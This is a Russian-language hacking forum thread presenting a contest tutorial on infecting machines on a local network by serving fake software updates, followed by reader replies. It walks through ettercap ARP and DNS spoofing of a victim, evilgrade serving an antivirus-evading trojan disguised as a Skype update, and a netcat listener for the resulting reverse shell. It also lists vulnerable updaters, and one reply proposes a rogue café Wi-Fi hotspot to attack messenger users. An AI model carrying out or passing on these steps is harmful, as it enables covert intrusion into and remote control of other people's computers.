Конкурс Заражение сети через обновление

Ondrik8

prodigy
Red Team
08.11.2016
832
2 134
#1
Статья для участия в конкурсе на codeby​

Всем привет, решил выдать еще одну статью на конкурс так-как сегодня узнал что в понедельник я уезжаю в ближнее зарубежье решать вопросы по работе(( Планировал я выпустить эту статью после 15 числа сего месяца но видно не судьба..) По этому выпускаю её экстерном и это будет заключительная моя статья для нашего конкурса от меня.
Речь пойдет о заражении машин в локальной сети через обновление софта пишу ее быстро так-как нужно еще успеть собраться в дорогу за орф. ошибки сильно не пинайте))
Приступлю как Все Мы знаем что все машины в сети постоянно делают запросы " типо не вышло ли что нить нового для меня!?" Это делают ОС-мы, программы от малого до велика платные и бесплатные все обращаются к своему источнику делая этот запрос "обновится"
Вот и расскажу я Вам как сделать fake-update так что бы при очередном запросе софта "домой" он (софт) получил ответ "типа: братка обновляйся! тут для тебя обновочка вышла" Софт в свою очередь будет дурить юзеру мозг, " Хозяин тут на меня обновка вышла нажми "ОК" я сам обновлюсь и будем мы жить с тобою в радости и в счастье"
Помогут нам осуществить эту атаку инструменты : metasploit, ettercap, netcat (котик) и гвоздь нашей программы
Чтобы видеть этот контент необходимо: Войти или зарегистрироваться

Эта утилита просто "бомбезная" мало того что у нее есть свои модули для фэйк обновления так она еще дает возможность создавать свои модули для целевой ОС-и (любой) Linux | Windows что конечно же и радует)) подробно об этом инструменте и как создавать модули, Вы можете узнать
Чтобы видеть этот контент необходимо: Войти или зарегистрироваться
.

  • Freerip 3.30
  • Jet photo 4.7.2
  • Teamviewer 5.1.9385
  • ISOpen 4.5.0
  • Istat.
  • Gom 2.1.25.5015
  • Atube catcher 1.0.300
  • Vidbox 7.5
  • Ccleaner 2.30.1130
  • Fcleaner 1.2.9.409
  • Allmynotes 1.26
  • Notepad++ 5.8.2
  • Java 1.6.0_22 winxp/win7
  • aMSN 0.98.3
  • Appleupdate <= 2.1.1.116 ( Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675)
  • Mirc 7.14
  • Windows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702, Microsoft works)
  • Dap 9.5.0.3
  • Winscp 4.2.9
  • AutoIt Script 3.3.6.1
  • Clamwin 0.96.0.1
  • AppTapp Installer 3.11 (Iphone/Itunes)
  • getjar (facebook.com)
  • Google Analytics Javascript injection
  • Speedbit Optimizer 3.0 / Video Acceleration 2.2.1.8
  • Winamp 5.581
  • TechTracker (cnet) 1.3.1 (Build 55)
  • Nokiasoftware firmware update 2.4.8es - (Windows software)
  • Nokia firmware v20.2.011
  • BSplayer 2.53.1034
  • Apt ( < Ubuntu 10.04 LTS)
  • Ubertwitter 4.6 (0.971)
  • Blackberry Facebook 1.7.0.22 | Twitter 1.0.0.45
  • Cpan 1.9402
  • VirtualBox (3.2.8 )
  • Express talk
  • Filezilla
  • Flashget
  • Miranda
  • Orbit
  • Photoscape.
  • Panda Antirootkit
  • Skype
  • Sunbelt
  • Superantispyware
  • Trillian <= 5.0.0.26
  • Adium 1.3.10 (Sparkle Framework)
  • VMware
  • more...

Далее что нам понадобится узнать родной дом программы для фэйк-обновления настроить инструмент ettercap

как узнать куда програмка стучится за обновкой можно двумя способами перехватить ее данные в wireshark-e или просто плотно изучив ее официальный сайт.

Узнали? Отлично, идем редачить файл конфигурации ettercap:

leafpad /etc/ettercap/etter.dns

2.png

и запускаем инструмент : ettercap -G

3.png

Sniff -->Unified Sniffing

Plugins -->Manage Plugins -->dns_spoof

4.png

Hosts --> scan hosts

Чтобы увидеть список машин в сети Hosts -> Hosts list

5.png

( по МАС-ам можете не стараться меня пробить)

Теперь поместите себя между маршрутизатором (192.168.1.1), выбрав его как Target 1 и жертву (192.168.1.--), выбрав его как Target 2.

и :

7.png

8.png
Отложим пока ettercap, настроим evilgrade до конца.

Как генерить и прятать троян от антивирусов здесь на Борде перемусолено, по этому останавливаться на этих моментах я не буду, как по мне так лучше, скачайте оригинал версию программы и смешайте её в shellter-e c Вашим трояном.

"вернемся к нашим баранам" Жванецкий

evilgrade > configure skype

10.png

evilgrade(skype) > set agent /root/папка_с_трояном/skype_update.exe <<-
настраиваем фэйк обновку)

evilgrade (skype) > start

Запускаем ettercap :

11.png

и просим котика что бы он слушал порт <-тот который слушает Метасплойт или Empire то есть на какой порт настроен наш троян!

nc -l -p 4444

и все!)) теперь когда жертва откроет в моем случае skype он (skype) в свою очередь по просит обновится она (терпилка) нажмет "ОК" а мы ....см. ниже))

Screenshot_1.png

как то так.))

PS: если выиграю конкурс часть средств уйдет в фонд маленьких замерзших котят, а остальное пойдет в фонд алкоголя для "crazy Rassian Hackers"
а если серьезно то за куплюсь плюшками-радиодеталями и буду Вас радывать новыми статьями)

Удачи..)

 

IioS

Well-Known Member
Red Team
09.06.2017
208
353
#2
Слышала что подобным методом было заражено сеть атомной станции. Этот метод очень сильный! Так как можно заразить все что хочешь, от пк к андроиду.
Вот мой пример как прятаться от АнтиВирусника
 
Последнее редактирование:

valerian38

Well-Known Member
20.07.2016
406
295
#4
Слышала что подобным методом было заражено сеть атомной станции
Ну не атомной станции, а предприятия по обогащению урана. Потом сеть там была локальная, заражение произошло через съёмный носитель.
 
Симпатии: Понравилось Vertigo

ohno

New Member
30.12.2016
3
0
#6
Как устанавливается evilgrade? Ни слова на гите не нашёл.
 

AL04E

anub1s c0d3by
Gold Team
24.05.2017
229
771
#7
Способ действительно отличный)
Нужно как-нибудь обязательно опробовать.
 

woolf1514

Well-Known Member
06.03.2017
137
113
#9
Мое почтение, автор. Это уже даже не технические навыки.. Это тех.скилзы + творчество. Побольше бы таких творцов, любящих делиться информацией!

Кстати, такая возможность реализована в intercepter-ng 1.0:

upload_2017-11-7_16-8-28.png
 

Вложения

Последнее редактирование:

newbiee

Well-Known Member
28.06.2017
47
61
#10
Мое почтение, автор. Это уже даже не технические навыки.. Это тех.скилзы + творчество. Побольше бы таких творцов, любящих делиться информацией!

Кстати, такая возможность реализована в intercepter-ng 1.0:

Посмотреть вложение 12668
так интерцептер же только в LAN работает? или я ошибаюсь?
 

newbiee

Well-Known Member
28.06.2017
47
61
#12
В основном, да. Но для некоторых целей можно заставить и в сеть смотреть
Я понял в чём соль, начал искать по поиску, статью: "Обходим NAT", а я её перенесли в серую секцию уже по ходу, да? Я прав? В эту сторону надо же копать? Короче надо срочно оформлять подписку на год)
 
Симпатии: Понравилось ghost

<~DarkNode~>

~^M1st3r_Bert0ni^~
Gold Team
19.10.2016
712
2 461
#15
Статья для участия в конкурсе на codeby​

Всем привет, решил выдать еще одну статью на конкурс так-как сегодня узнал что в понедельник я уезжаю в ближнее зарубежье решать вопросы по работе(( Планировал я выпустить эту статью после 15 числа сего месяца но видно не судьба..) По этому выпускаю её экстерном и это будет заключительная моя статья для нашего конкурса от меня.
Речь пойдет о заражении машин в локальной сети через обновление софта пишу ее быстро так-как нужно еще успеть собраться в дорогу за орф. ошибки сильно не пинайте))
Приступлю как Все Мы знаем что все машины в сети постоянно делают запросы " типо не вышло ли что нить нового для меня!?" Это делают ОС-мы, программы от малого до велика платные и бесплатные все обращаются к своему источнику делая этот запрос "обновится"
Вот и расскажу я Вам как сделать fake-update так что бы при очередном запросе софта "домой" он (софт) получил ответ "типа: братка обновляйся! тут для тебя обновочка вышла" Софт в свою очередь будет дурить юзеру мозг, " Хозяин тут на меня обновка вышла нажми "ОК" я сам обновлюсь и будем мы жить с тобою в радости и в счастье"
Помогут нам осуществить эту атаку инструменты : metasploit, ettercap, netcat (котик) и гвоздь нашей программы
Чтобы видеть этот контент необходимо: Войти или зарегистрироваться

Эта утилита просто "бомбезная" мало того что у нее есть свои модули для фэйк обновления так она еще дает возможность создавать свои модули для целевой ОС-и (любой) Linux | Windows что конечно же и радует)) подробно об этом инструменте и как создавать модули, Вы можете узнать
Чтобы видеть этот контент необходимо: Войти или зарегистрироваться
.


  • Freerip 3.30
    Jet photo 4.7.2
    Teamviewer 5.1.9385
    ISOpen 4.5.0
    Istat.
    Gom 2.1.25.5015
    Atube catcher 1.0.300
    Vidbox 7.5
    Ccleaner 2.30.1130
    Fcleaner 1.2.9.409
    Allmynotes 1.26
    Notepad++ 5.8.2
    Java 1.6.0_22 winxp/win7
    aMSN 0.98.3
    Appleupdate <= 2.1.1.116 ( Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675)
    Mirc 7.14
    Windows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702, Microsoft works)
    Dap 9.5.0.3
    Winscp 4.2.9
    AutoIt Script 3.3.6.1
    Clamwin 0.96.0.1
    AppTapp Installer 3.11 (Iphone/Itunes)
    getjar (facebook.com)
    Google Analytics Javascript injection
    Speedbit Optimizer 3.0 / Video Acceleration 2.2.1.8
    Winamp 5.581
    TechTracker (cnet) 1.3.1 (Build 55)
    Nokiasoftware firmware update 2.4.8es - (Windows software)
    Nokia firmware v20.2.011
    BSplayer 2.53.1034
    Apt ( < Ubuntu 10.04 LTS)
    Ubertwitter 4.6 (0.971)
    Blackberry Facebook 1.7.0.22 | Twitter 1.0.0.45
    Cpan 1.9402
    VirtualBox (3.2.8 )
    Express talk
    Filezilla
    Flashget
    Miranda
    Orbit
    Photoscape.
    Panda Antirootkit
    Skype
    Sunbelt
    Superantispyware
    Trillian <= 5.0.0.26
    Adium 1.3.10 (Sparkle Framework)
    VMware
    more...

Далее что нам понадобится узнать родной дом программы для фэйк-обновления настроить инструмент ettercap

как узнать куда програмка стучится за обновкой можно двумя способами перехватить ее данные в wireshark-e или просто плотно изучив ее официальный сайт.

Узнали? Отлично, идем редачить файл конфигурации ettercap:

leafpad /etc/ettercap/etter.dns

Посмотреть вложение 12563

и запускаем инструмент : ettercap -G

Посмотреть вложение 12564

Sniff -->Unified Sniffing

Plugins -->Manage Plugins -->dns_spoof

Посмотреть вложение 12565

Hosts --> scan hosts

Чтобы увидеть список машин в сети Hosts -> Hosts list

Посмотреть вложение 12566

( по МАС-ам можете не стараться меня пробить)

Теперь поместите себя между маршрутизатором (192.168.1.1), выбрав его как Target 1 и жертву (192.168.1.--), выбрав его как Target 2.

и :

Посмотреть вложение 12567

Посмотреть вложение 12568
Отложим пока ettercap, настроим evilgrade до конца.

Как генерить и прятать троян от антивирусов здесь на Борде перемусолено, по этому останавливаться на этих моментах я не буду, как по мне так лучше, скачайте оригинал версию программы и смешайте её в shellter-e c Вашим трояном.

"вернемся к нашим баранам" Жванецкий

evilgrade > configure skype

Посмотреть вложение 12569

evilgrade(skype) > set agent /root/папка_с_трояном/skype_update.exe <<-
настраиваем фэйк обновку)

evilgrade (skype) > start

Запускаем ettercap :

Посмотреть вложение 12570

и просим котика что бы он слушал порт <-тот который слушает Метасплойт или Empire то есть на какой порт настроен наш троян!

nc -l -p 4444

и все!)) теперь когда жертва откроет в моем случае skype он (skype) в свою очередь по просит обновится она (терпилка) нажмет "ОК" а мы ....см. ниже))

Посмотреть вложение 12572

как то так.))

PS: если выиграю конкурс часть средств уйдет в фонд маленьких замерзших котят, а остальное пойдет в фонд алкоголя для "crazy Rassian Hackers"
а если серьезно то за куплюсь плюшками-радиодеталями и буду Вас радывать новыми статьями)

Удачи..)
Блин , не хочу выглядит гамнокритиком) но где профит самой сессии? Тема эвилгрейда была популярна еще во времена четвертого бактрака (была эта тулза в репозиториях бактрака)
именно когда обновления прилетали по http или ftp , без проверки подписи сертификата и без ssl

Имеет конечно место быть данный вектор , но перед тем как его применить нужно быть уверенным что обновления приходят не по ssl и не проверяются подпись и хеш сумы файлов обновления.

По этому я же говорю, где сам профит ,конечный результат??
Последний раз эта утилита у меня работала на обновлении notepad++ в 2013 году. Сейчас не знаю.
Просьба запрофитить на обновоении винды как к твоей статье.)))
 
Что бы не быть голословным прошу обратить внимание на дату первого упоминания евилгрейда в гугле:
Вбиваем evilgrade в гугле
и видем первое упоминание в 2011 году в журнале хакер,первые видосы в 2013 году.
 

PingVinich

Bug hunter
Gold Team
19.03.2017
128
302
#16
Блин , не хочу выглядит гамнокритиком) но где профит самой сессии? Тема эвилгрейда была популярна еще во времена четвертого бактрака (была эта тулза в репозиториях бактрака)
именно когда обновления прилетали по http или ftp , без проверки подписи сертификата и без ssl

Имеет конечно место быть данный вектор , но перед тем как его применить нужно быть уверенным что обновления приходят не по ssl и не проверяются подпись и хеш сумы файлов обновления.

По этому я же говорю, где сам профит ,конечный результат??
Последний раз эта утилита у меня работала на обновлении notepad++ в 2013 году. Сейчас не знаю.
Просьба запрофитить на обновоении винды как к твоей статье.)))
 
Что бы не быть голословным прошу обратить внимание на дату первого упоминания евилгрейда в гугле:
Вбиваем evilgrade в гугле
и видем первое упоминание в 2011 году в журнале хакер,первые видосы в 2013 году.
Тоже хотел это написать, но ты меня опередил.
 

Злой Дядька

Well-Known Member
Grey Team
30.12.2017
158
273
#17
Способ рабочий и по сей день . Я имею ввиду саму схему , заражение через вызов обновления . Работает со всем чем пожелаете , начиная от смартфонов и заканчивая ноутбуками на разных ОС . Засветив точку доступа(квадратов так на 100) и замаскировав ее под молодежное кафе или ресторан (в центра любого города) , можно очень сильно налиходееть , используя атаку на приложение которым пользуются почти все , а именно мессенджеры Вайбер или Ваттсап . Единственное различие в том , что evilgrade позволял это сделать любому новичку на готовых модулях , а сейчас это делается на самописных скриптах , но сам способ рабочий . Но это очень дерзкое занятие и требуется соблюдать безопасность
 

Ondrik8

prodigy
Red Team
08.11.2016
832
2 134
#18
Способ рабочий и по сей день . Я имею ввиду саму схему , заражение через вызов обновления . Работает со всем чем пожелаете , начиная от смартфонов и заканчивая ноутбуками на разных ОС . Засветив точку доступа(квадратов так на 100) и замаскировав ее под молодежное кафе или ресторан (в центра любого города) , можно очень сильно налиходееть , используя атаку на приложение которым пользуются почти все , а именно мессенджеры Вайбер или Ваттсап . Единственное различие в том , что evilgrade позволял это сделать любому новичку на готовых модулях , а сейчас это делается на самописных скриптах , но сам способ рабочий . Но это очень дерзкое занятие и требуется соблюдать безопасность
вижу.... Спец, ответил!) естть еще способы заражения, но опасно давать людям такие знания!
 

Злой Дядька

Well-Known Member
Grey Team
30.12.2017
158
273
#19
вижу.... Спец, ответил!) естть еще способы заражения, но опасно давать людям такие знания!
Вы совершенно правы , учитывая то что в Снг (и не только) могут упаковать лишь за комментарий , то что уж и говорить о наших методах) К тому же кощунство выкладывать новичкам уязвимости , над которыми работаешь порой продолжительное время . Хотя мне жаль начинающих ребят , слишком большой порог вхождения сейчас и они бывают разочаровываются видя лишь методики в открытом доступе , которые блокируются всем чем можно уже на стадии выходи эксплойта .
 

pro194

Active Member
30.06.2017
40
48
#20
Огненная статья! Как раз в тему зашла, надеюсь что в поле она отработает себя на 100%. Спасибо за труды!